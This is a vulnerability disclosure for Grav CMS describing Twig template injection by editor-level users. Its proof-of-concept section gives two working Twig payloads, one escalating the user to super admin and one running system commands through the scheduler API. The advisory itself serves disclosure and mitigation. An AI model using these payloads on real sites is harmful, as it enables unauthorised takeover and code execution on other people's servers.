Grav CMS vulnerability
A zero day vulnerability in content management system.
CVE‑ID: CVE‑TBD
Published: 2025-07-27
Reported: 2025-04-18
Last Updated: 2025-07-27
Severity: CVSS v3.0 Base Score: 8.8 (vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Affected Versions: From1.7.0through1.7.48and all prereleases1.8.1 - 1.8.4
Fixed Version:None
1. Executive Summary
A user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter or settings. By injecting malicious Twig expressions, the user can escalate their privileges to (super) admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities.
2. Timeline
| Date | Event | Days since initial report |
|---|---|---|
| 2025‑04‑18 | Initial disclosure sent via email to maintainers. | 0 |
| 2025‑04‑21 | Added to upstream Security Advisory board. | 3 |
| 2025‑06‑03 | First follow‑up emailed—no reply. | 46 |
| 2025‑06‑20 | Comment posted on advisory—no reply. | 63 |
| 2025‑07‑19 | Last‑call email sent (1 week deadline). | 92 |
| 2025‑07‑27 | Public disclosure. | 100 |
3. Details & Proof-of-Concept
3.1 Details
Grav CMS allows Twig to be executed in page templates if enabled in admin panel (process: twig: true). A user with publisher/editor privileges, that can create or edit pages and enable twig processing, can thereby inject arbitrary code that will execute in the context of the page render.
This enables exploitation of Grav internal APIs such as:
grav.user.update()andgrav.user.save()for escalating the current user to super admin or admingrav.scheduler.addCommand(),grav.scheduler.save()andgrav.scheduler.run()for code execution
The Twig sandbox is not enforced in this context, allowing full access to any backend PHP object and method in the system/src/Grav/Common directory.
3.2 PoC
Preconditions:
- You must have access to at least editor level user with permission to create/edit pages (
admin.pagesaccess)- For Privilege Escalation, you also have to be logged in to the site with the same user as the admin panel.
Steps to reproduce Privilege Escalation:
- Login into the non-admin page (default at
cms-url/login). - Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).
Inject the following payload into the page content to escalate privileges:
1 2 3 4 5 6 7 8 9
{% set _ = grav.user.update({ 'access': { 'admin': { 'login': true, 'super': true } } }, {}) %} {% set _ = grav.user.save() %}- Visit the edited/created page url. The logged in user is now admin. (Note: For the changes to show, you need to log out of the admin panel and relogin).
Steps to reproduce Remote Code Execution:
- Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).
Inject the following payload into the page content to execute commands:
1 2 3
{% set _ = grav.scheduler.addCommand('curl', ['http://localhost:8000']) %} {% set _ = grav.scheduler.save() %} {% set _ = grav.scheduler.run() %}- Visit the page to trigger the execution. The system will issue a
curlrequest.
4. Impact
Scope: Remote Code Execution as any authenticated user.
Impact: Full system compromise, data exfiltration, pivot to internal networks.
CVSS v3.1 Vector: CVSS v3.0 vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
5. Mitigation & Patch
Currently, there is no official patch for this exploit.
I recommend globally turning off twig processing as a temporary fix.
6. Disclosure & Credits
Discovered and reported by p1r0x.